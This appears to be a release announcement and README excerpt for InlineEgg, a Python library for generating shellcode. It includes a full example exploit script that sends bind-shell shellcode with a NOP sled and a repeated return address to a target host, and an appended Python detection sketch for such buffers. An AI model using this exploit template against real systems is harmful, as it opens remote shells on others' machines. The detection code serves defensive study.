
InlineEgg library release



We'd like to share with you the release of InlineEgg 1.0. The following is a reduced version of the README available at http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html;
the same page points to the .tar.gz.


Welcome to InlineEgg.

Short version:

InlineEgg is a collection of Python classes (a "library"), that will help
you write small assembly programs, either to use as eggs/shellcode for your
exploits or for anything else you may need small assembly programs for. But!
without writing assembly, just using Python.

InlineEgg is now included in CORE IMPACT as another component of its egg
creation framework, but it started as a pretty simple idea to fulfill a pretty
simple need. We hope that you find it helpful for your own creations, so we
are releasing it under an open source license for non-commercial uses.

Long version:

A simple need: When writing exploits for remote code execution
   vulnerabilities (yes, that's what we do part of the time), you usually
   need to have a small assembly program that will be sent to the vulnerable
   application as part of the exploiting process. Historically, these small
   pieces of assembly code (eggs) were hardcoded as dead strings in the
   middle of the exploit. But, although having the strings handy gave the
   exploit writer some reusability and some flexibility, we sometimes needed
   more, we even needed the possibility of creating our small assembly
   programs at runtime, and making them adapt to the situation... well,
   there are lots of different solutions to the problem, but as I already
   had some ideas on how to do it, I jumped into Python.

A simple idea: Do something that lets us create small assembly programs by
   concatenating system calls, giving us the possibility of changing the
   arguments to the system calls, and adding more code when needed...

   [...]

--- example2.py -----------------------------------------
#!/usr/bin/python

from inlineegg import *
import socket
import struct
import sys

def listenShellEgg(listen_addr, listen_port):

#   egg = InlineEgg(FreeBSDx86Syscall)
#   egg = InlineEgg(OpenBSDx86Syscall)
  egg = InlineEgg(Linuxx86Syscall)

  # bind to port and listen
  sock = egg.socket(socket.AF_INET,socket.SOCK_STREAM)
  sock = egg.save(sock)                        # save the socket in a variable (in stack)
  egg.bind(sock, (listen_addr, listen_port))   # sock is now the variable, and it's used from the stack
  egg.listen(sock,1)

  client = egg.accept(sock, 0, 0)
  client = egg.save(client)
  egg.close(sock)

  egg.dup2(client, 0)
  egg.dup2(client, 1)
  egg.dup2(client, 2)
  egg.execve('/bin/sh',('bash','-i'))

  print "Egg len: %d" % len(egg)
  return egg

def main():
  if len(sys.argv) < 3:
     # fill in the script name that the %s placeholder expects
     raise Exception, "Usage: %s <target ip> <target port>" % sys.argv[0]

  # connect to target
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  sock.connect((sys.argv[1], int(sys.argv[2])))

  # create egg
  egg = listenShellEgg('0.0.0.0',3334)

  # exploit

  retAddr = struct.pack('<L',0xbffffc24L)
  toSend  = "\x90"*(1024-len(egg))
  toSend += egg.getCode()
  toSend += retAddr*20

  sock.send(toSend)

main()
---------------------------------------------------------

   [...]

InlineEgg: http://community.corest.com/~gera/ProgrammingPearls/InlineEgg.html

   I hope you find it useful and enjoy it,
   gera
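
Added example, not part of the original post or of InlineEgg: a detection-side sketch in Python 3 that flags buffers shaped like the one example2.py sends (a long run of 0x90 padding, some code, then one 32-bit word repeated at the end). The function names, thresholds and sample buffers are assumptions constructed for illustration; only the 0x90 padding, the 1024-byte layout and the repeated word 0xbffffc24 come from the listing above.

```python
import struct

NOP = 0x90  # single-byte x86 NOP, the padding byte used in example2.py

def longest_run(data, byte=NOP):
    """Return (offset, length) of the longest run of `byte` in data."""
    best_off, best_len, i = -1, 0, 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == byte:
            j += 1
        if j - i > best_len:
            best_off, best_len = i, j - i
        i = max(j, i + 1)
    return best_off, best_len

def trailing_repeats(data, width=4):
    """Return (count, word): how often the last `width` bytes repeat back to back."""
    word, count, pos = data[-width:], 0, len(data)
    while pos >= width and data[pos - width:pos] == word:
        count += 1
        pos -= width
    return count, word

def inspect_payload(data, min_sled=64, min_repeats=8):
    """Flag buffers shaped like <NOP sled><code><repeated 32-bit word>."""
    sled_off, sled_len = longest_run(data)
    repeats, word = trailing_repeats(data)
    match = (sled_len >= min_sled and repeats >= min_repeats
             and word != bytes([NOP]) * 4)   # an all-NOP tail is just more sled
    return {"match": match, "sled_offset": sled_off, "sled_len": sled_len,
            "repeats": repeats, "word": word.hex()}

# Constructed samples: 124 bytes of "A" stand in for the egg (no real code).
SUSPICIOUS = b"\x90" * 900 + b"A" * 124 + struct.pack("<L", 0xbffffc24) * 20
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for name, buf in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, inspect_payload(buf))
```

The thresholds (64 padding bytes, 8 repeats) are starting points to tune against your own traffic. A check like this only covers plain 0x90 padding; sleds built from other instructions or encoded payloads need different signals.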